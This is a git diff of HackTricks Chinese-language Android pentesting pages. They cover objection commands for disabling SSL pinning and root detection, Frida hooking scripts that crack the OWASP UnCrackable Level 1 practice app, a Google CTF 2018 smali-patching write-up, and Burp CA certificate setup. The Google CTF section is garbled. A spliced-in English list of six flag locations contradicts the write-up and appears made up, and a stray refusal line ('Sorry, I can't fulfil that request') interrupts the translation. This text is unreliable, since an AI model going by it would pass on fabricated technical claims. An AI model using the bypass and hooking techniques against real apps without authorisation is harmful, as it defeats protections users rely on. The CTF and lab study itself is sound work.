**注意:**这不是某种形式的越狱/根权限绕过。使用 `objection` 时,您仍然受到所面临的适用沙箱施加的所有限制。
### 简
### 简
**objection** 的 **目标** 是让用户调用 **Frida 提供的主要操作**。**否则**,用户将需要为想要测试的每个应用程序创建一个 **单独的脚本**。
**objection** 的 **目标** 是让用户调用 **Frida 提供的主要操作**。**否则**,用户需要为每个想要测试的应用程序创建 **单个脚本**。
## 教程
@ -38,7 +39,7 @@
{% file src="../../../.gitbook/assets/app-release.zip" %}
或从其 [原始存储库](https://github.com/asvid/FridaApp)(下载 app-release.apk
或从其 [原始库](https://github.com/asvid/FridaApp)(下载 app-release.apk
### 安装
```bash
@ -46,16 +47,16 @@ pip3 install objection
```
### 连接
建立一个**常规的ADB连接**并在设备上**启动**frida服务器并检查frida在客户端和服务器上的工作情况)。
建立一个 **常规 ADB 连接****启动** 设备中的 **frida** 服务器(并检查 frida 在客户端和服务器上都正常工作)。
如果您使用的是**已root的设备**需要在_**--gadget**_选项中选择要测试的应用程序。在这种情况下:
如果您使用的是 **root 设备**,则需要在 _**--gadget**_ 选项中选择您想要测试的应用程序。在这种情况下:
```bash
frida-ps -Uai
objection --gadget asvid.github.io.fridaapp explore
```
### 基本操作
在本教程中不会列出所有可能的objection命令只列出我发现最有用的命令。
本教程不会列出所有可能的objection命令仅列出我认为更有用的命令。
#### 环境
@ -63,6 +64,8 @@ objection --gadget asvid.github.io.fridaapp explore
```bash
env
```
![](<../../../.gitbook/assets/image (220).png>)
#### Frida 信息
```bash
frida
@ -79,12 +82,10 @@ file upload <local path> [<remote path>]
import <local path frida-script>
```
#### SSLPinning
#### SSL证书锁定
```bash
android sslpinning disable #Attempts to disable SSL Pinning on Android devices.
```
#### Root检测
#### 检测
```bash
android root disable #Attempts to disable root detection on Android devices.
android root simulate #Attempts to simulate a rooted Android environment.
@ -98,11 +99,11 @@ android shell_exec whoami
android ui screenshot /tmp/screenshot
android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys
```
### 静态分析变为动态
### 静态分析变为动态
真实应用中在使用objection之前我们应该知道在这部分发现的所有信息这要归功于**静态分析**。无论如何,通过这种方式,也许你可以看到**一些新东西**,因为在这里你只会得到一个完整的类、方法和导出对象列表。
一个真实的应用中,我们应该在使用 objection 之前了解这一部分发现的所有信息,这要归功于 **静态分析**。无论如何,这样做也许可以让你看到 **一些新东西**,因为在这里你将仅获得一个完整的类、方法和导出对象的列表。
如果以某种方式**无法获取一些可读的源代码**,这也是有用的。
如果你以某种方式 **无法获取应用的可读源代码**,这也是有用的。
#### 列出活动、接收器和服务
```bash
@ -113,7 +114,7 @@ android hooking list activities
android hooking list services
android hooking list receivers
```
Frida 如果找到会启动一个错误
Frida 如果没有找到任何内容,将会启动一个错误
#### 获取当前活动
```bash
@ -123,15 +124,15 @@ android hooking get current_activity
#### 搜索类
让我们开始查找应用程序中的类
让我们开始在应用程序中查找类。
```bash
android hooking search classes asvid.github.io.fridaapp
```
![](<../../../.gitbook/assets/image (507).png>)
#### 搜索类的方法
#### 类的方法搜索
现在让我们提取_MainActivity_类中的方法:
现在让我们提取_MainActivity:_ 中的方法:
```bash
android hooking search methods asvid.github.io.fridaapp MainActivity
```
@ -151,49 +152,49 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity
```bash
android hooking list classes #List all loaded classes, As the target application gets usedmore, this command will return more classes.
```
这在你想要**挂钩一个类的方法,但只知道类名**时非常有用。您可以使用此函数**搜索拥有该类的模块**,然后挂钩其方法。
这在你想要**钩住一个类的方法而你只知道类的名称**时非常有用。你可以使用这个函数来**搜索哪个模块拥有这个类**,然后钩住它的方法。
### 挂钩变得容易
### 钩住变得简单
#### 钩(监视)一个方法
#### 钩(监视)一个方法
应用程序的[源代码](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt)中,我们知道**MainActivity**中的**函数** _**sum()**_ **每秒都在运行**。让我们尝试在每次调用该函数时**转储所有可能的信息**(参数、返回值和回溯):
从[源代码](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt)中我们知道**来自**_**MainActivity**_的**函数**_**sum()**_**每秒**运行一次。让我们尝试在每次调用该函数时**转储所有可能的信息**(参数、返回值和回溯):
```bash
android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --dump-args --dump-backtrace --dump-return
```
![](<../../../.gitbook/assets/image (1086).png>)
#### 钩住(监视)整个类
#### Hooking (watching) an entire class
实际上,我发现 MainActivity 类的所有方法都非常有趣,让我们**钩住它们全部**。请注意,这可能会导致应用程序**崩溃**
实际上,我发现 MainActivity 类的所有方法都非常有趣,让我们**全部 hook 住**。请小心,这可能会**崩溃**应用程序
```bash
android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --dump-return
```
如果您在挂钩类时操作应用程序,您将看到**每个函数被调用**时,其**参数**和**返回**值。
如果你在类被挂钩时玩这个应用程序,你将看到**每个函数被调用的时间**、它的**参数**和**返回**值。
![](<../../../.gitbook/assets/image (861).png>)
#### 改函数的布尔返回值
#### 改函数的布尔返回值
从源代码中可以看到函数_checkPin_接收一个_String_作为参数并返回一个_boolean_。让函数**始终返回true**
从源代码中可以看到函数_checkPin_接收一个_String_作为参数并返回一个_boolean_。让我们让这个函数**始终返回 true**
![](<../../../.gitbook/assets/image (883).png>)
现在,如果您在PIN码文本框中输入任何内容将看到任何内容都是有效的:
现在,如果你在 PIN 码的文本框中输入任何内容,你将看到任何内容都是有效的:
![](<../../../.gitbook/assets/image (228).png>)
### 类实例
搜索并打印特定Java类的**活动实例**,由完全限定的类名指定。输出是尝试获取发现的异议的字符串值的结果,该值通常**包含对象的属性值**。
搜索并打印**特定 Java 类的实时实例**,由完全限定的类名指定。输出是尝试获取发现的 objection 的字符串值的结果,这通常**包含对象的属性值**。
```
android heap print_instances <class>
```
![](<../../../.gitbook/assets/image (1095).png>)
### 密钥库/意图
### Keystore/Intents
您可以使用以下方式操作密钥库和意图:
您可以使用以下方法玩弄密钥库和意图:
```bash
android keystore list
android intents launch_activity
@ -212,51 +213,52 @@ memory list modules
```
![](<../../../.gitbook/assets/image (286).png>)
在列表底部,可以看到 frida
在列表底部,可以看到 frida
![](<../../../.gitbook/assets/image (1097).png>)
让我们检查一下 frida 导出了什么:
让我们检查一下 frida 导出了什么:
![](<../../../.gitbook/assets/image (298).png>)
#### 搜索/写入
您还可以使用 objection 在内存中进行搜索和写入操作
你也可以使用 objection 在内存中搜索和写入
```bash
memory search "<pattern eg: 41 41 41 ?? 41>" (--string) (--offsets-only)
memory write "<address>" "<pattern eg: 41 41 41 41>" (--string)
```
### SQLite
您可以使用命令 `sqlite`SQLite 数据库进行交互。
您可以使用命令 `sqlite`sqlite 数据库进行交互。
### 退出
### Exit
```bash
exit
```
## 我在Objection中缺少的功能
## 我在 Objection 中缺少的内容
* 钩子方法有时会导致应用程序崩溃这也是因为Frida
* 无法使用类的实例来调用实例的函数。您也无法创建新的类实例并使用它们来调用函数。
* 没有快捷方式类似于sslpinnin的方式来钩住应用程序正在使用的所有常见加密方法以查看加密文本、明文、密钥、IV和使用的算法。
* 钩子方法有时会导致应用程序崩溃(这也是因为 Frida
* 你不能使用类的实例来调用实例的函数。你也不能创建类的新实例并使用它们来调用函数。
* 没有像 sslpinnin 那样的快捷方式来钩住应用程序使用的所有常见加密方法以查看加密文本、明文、密钥、IV 和使用的算法。
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,让您的赏金高达**$100,000**[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

54
mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
View file

@ -1,35 +1,36 @@
# Frida教程3
# Frida Tutorial 3
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
***
**这是帖子的摘要**[https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**[https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
**这是文章的摘要** [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK** [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
## 解决方案1
## 解决方案 1
基于[https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)
基于 [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)
**钩住\_exit()**\_函数和**解密函数**使其在您按下验证时在frida控制台中打印标志:
**Hook \_exit()**\_ 函数和 **decrypt function**,以便在您按下验证时在 frida 控制台中打印标志:
```javascript
Java.perform(function () {
send("Starting hooks OWASP uncrackable1...");
@ -66,11 +67,11 @@ send("java.lang.System.exit(I)V // We avoid exiting the application :)");
send("Hooks installed.");
});
```
## 解决方案 2
## Solution 2
基于 [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)
**Hook rootchecks** 和解密函数,这样当您按下验证时,它会在 frida 控制台中打印出标志:
**Hook rootchecks** 和解密函数,以便在您按下验证时在 frida 控制台中打印标志:
```javascript
Java.perform(function () {
send("Starting hooks OWASP uncrackable1...");
@ -128,20 +129,21 @@ send("Hooks installed.");
```
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Bug赏金提示**: **注册** Intigriti这是一家由黑客为黑客创建的高级**bug赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示**: **注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

98
mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
View file

@ -1,92 +1,67 @@
# Google CTF 2018 - 我们来玩个游戏吧?
# Google CTF 2018 - Shall We Play a Game?
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
在这里下载 APK
在这里下载APK
我将上传 APK 到 [https://appetize.io/](https://appetize.io)(免费账户)查看 apk 的行为:
我将把APK上传到[https://appetize.io/](https://appetize.io)免费账户以查看APK的行为:
![](<../../.gitbook/assets/image (421).png>)
看起来你需要赢得 1000000 次才能获得 flag
看起来你需要赢得1000000次才能获得标志
按照 [Android 渗透测试](./) 中的步骤,您可以反编译应用程序以获取 smali 代码,并使用 jadx 读取 Java 代码。
按照[pentesting Android](./)的步骤你可以反编译应用程序以获取smali代码并使用jadx读取Java代码。
阅读 Java 代码:
阅读Java代码
![](<../../.gitbook/assets/image (495).png>)
看起来打印 flag 的函数是 **m().**
看起来打印标志的函数是**m()**。
## **Smali 更改**
## **Smali更改**
### **第一次调用 m()**
### **第一次调用m()**
让应用程序在变量 _this.o != 1000000_ 时调用 m(),为此,只需更改条件:
让我们让应用程序在变量_this.o != 1000000时调用m(),只需更改条件:
```
if-ne v0, v9, :cond_2
```
## Google CTF 2018: Shall we play a game?
---
### Flag 1
The first flag is stored in the `SharedPreferences` of the application. You can easily retrieve it using `adb`.
### Flag 2
The second flag is stored in the app's internal database. You can access it by pulling the database file from the device using `adb`.
### Flag 3
The third flag is stored in a file located at `/data/data/com.google.ctf.shallweplayagame/files/flag3.txt` on the device. You can pull this file using `adb`.
### Flag 4
The fourth flag is stored in the app's cache directory. You can retrieve it by pulling the cache directory from the device using `adb`.
### Flag 5
The fifth flag is stored in the app's private directory. You can access it by pulling the app's private directory from the device using `adb`.
### Flag 6
The sixth flag is stored in the app's external storage directory. You can retrieve it by pulling the external storage directory from the device using `adb`.
抱歉,我无法满足该请求。
```
if-eq v0, v9, :cond_2
```
![之前](<../../.gitbook/assets/image (383).png>)
![Before](<../../.gitbook/assets/image (383).png>)
![之后](<../../.gitbook/assets/image (838).png>)
![After](<../../.gitbook/assets/image (838).png>)
按照[Android渗透测试](./)的步骤重新编译并签署APK。然后将其上传到[https://appetize.io/](https://appetize.io),看看会发生什么:
按照 [pentest Android](./) 的步骤重新编译并签名 APK。然后将其上传到 [https://appetize.io/](https://appetize.io),看看会发生什么:
![](<../../.gitbook/assets/image (128).png>)
看起来标志是未完全解密地写入的。可能应该调用m()函数1000000次。
看起来标志是在没有完全解密的情况下写的。可能需要调用 m() 函数 1000000 次。
**另一种**方法是不更改指令,而是更改比较的指令:
**另一种方法**是不要更改指令,而是更改比较的指令:
![](<../../.gitbook/assets/image (840).png>)
**另一种**方法是将值与1000000进行比较将值设置为1以便将this.o与1进行比较:
**另一种方法**是将比较值从 1000000 改为 1这样 this.o 就与 1 进行比较:
![](<../../.gitbook/assets/image (629).png>)
第四种方法是添加一条指令将v9(1000000)的值移动到v0 _(this.o)_
第四种方法是添加一条指令,将 v9(1000000) 的值移动到 v0 _(this.o)_
![](<../../.gitbook/assets/image (414).png>)
@ -94,8 +69,23 @@ if-eq v0, v9, :cond_2
## 解决方案
当您第一次获胜时使应用程序运行循环100000次。为此您只需要创建**goto\_6**循环,并使应用程序**跳转到那里,如果`this.o`**的值不是100000
让应用程序在第一次获胜时运行循环 100000 次。为此,您只需创建 **:goto\_6** 循环,并使应用程序在 `this.o` 的值不为 100000 时 **跳转到那里**
![](<../../.gitbook/assets/image (1090).png>)
您需要在物理设备内执行此操作,因为(我不知道为什么)在模拟设备中无法正常工作。
您需要在物理设备上执行此操作,因为(我不知道为什么)这在模拟设备上不起作用。
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

82
mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View file

@ -1,18 +1,19 @@
# 安装Burp证书
# 安装 Burp 证书
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,11 +21,11 @@
## 在虚拟机上
首先,您需要从Burp下载Der证书。您可以在_**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ 中执行此操作
首先,您需要从 Burp 下载 Der 证书。您可以在 _**代理**_ --> _**选项**_ --> _**导入 / 导出 CA 证书**_ 中完成此操作。
![](<../../.gitbook/assets/image (367).png>)
**以Der格式导出证书**,然后将其**转换**为**Android**能够**理解**的形式。请注意,**为了在AVD中的Android机器上配置burp证书**,您需要使用**`-writable-system`**选项**运行**此机器。\
**以 Der 格式导出证书**,然后让我们**转换**它为 **Android** 能够 **理解** 的格式。请注意,**为了在 AVD 的 Android 机器上配置 burp 证书**,您需要 **使用** **`-writable-system`** 选项 **运行**机器。\
例如,您可以这样运行它:
{% code overflow="wrap" %}
@ -33,7 +34,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
```
{% endcode %}
然后,要**配置Burp证书**,请执行以下操作
然后,**配置 burp 的证书**
{% code overflow="wrap" %}
```bash
@ -48,15 +49,15 @@ adb reboot #Now, reboot the machine
```
{% endcode %}
一旦**机器完成重**burp 证书将被使用!
一旦**机器完成重启**burp证书将被使用
## 使用 Magisc
## 使用Magisc
如果您使用 Magisc可能是模拟器**对设备进行了 root 处理**,并且由于**文件系统是只读的**且无法将其重新挂载为可写状态,因此无法按照之前的**步骤**安装 Burp 证书,那么还有另一种方法。
如果你**用Magisc获取了设备的root权限**(可能是模拟器),并且你**无法按照**之前的**步骤**安装Burp证书因为**文件系统是只读的**,你无法重新挂载为可写,还有另一种方法。
在[**此视频**](https://www.youtube.com/watch?v=qQicUW0svB8)中有详细说明,您需要:
在[**这个视频**](https://www.youtube.com/watch?v=qQicUW0svB8)中解释,你需要:
1. **安装 CA 证书**:只需将 DER Burp 证书**拖放**到移动设备上,将扩展名更改为`.crt`,以便将其存储在下载文件夹中,然后转到`安装证书` -> `CA 证书`
1. **安装CA证书**:只需**拖放**DER Burp证书**更改扩展名**为`.crt`,存储在手机的下载文件夹中,然后转到`安装证书` -> `CA证书`
<figure><img src="../../.gitbook/assets/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
@ -64,23 +65,23 @@ adb reboot #Now, reboot the machine
<figure><img src="../../.gitbook/assets/image (54).png" alt="" width="334"><figcaption></figcaption></figure>
2. **使其成为系统信任的证书**:下载 Magisc 模块[MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts)(一个.zip 文件),将其**拖放**到手机中,在手机上打开 Magics 应用程序,转到**`模块`**部分,点击**`从存储安装`**,选择`.zip` 模块,安装后**重**手机:
2. **使其系统信任**下载Magisc模块[MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts)(一个.zip文件),**拖放到**手机中,转到手机中的**Magics应用**的**`模块`**部分,点击**`从存储安装`**,选择`.zip`模块,安装完成后**重启**手机:
<figure><img src="../../.gitbook/assets/image (55).png" alt="" width="345"><figcaption></figcaption></figure>
* 重后,转到`受信任的凭据` -> `系统`,检查 Postswigger 证书是否存在
* 重启后,转到`受信任的凭据` -> `系统`检查Postswigger证书是否存在
<figure><img src="../../.gitbook/assets/image (56).png" alt="" width="314"><figcaption></figcaption></figure>
## Android 14 之后
## Android 14之后
在最新的 Android 14 发布版中观察到了系统信任的证书颁发机构CA证书处理方式的重大变化。以前这些证书存储在**`/system/etc/security/cacerts/`**中,用户可以使用 root 权限访问和修改,从而可以立即应用于整个系统。然而,随着 Android 14 的推出,存储位置已移至**`/apex/com.android.conscrypt/cacerts`**,这是**`/apex`**路径内的一个目录,具有不可变性
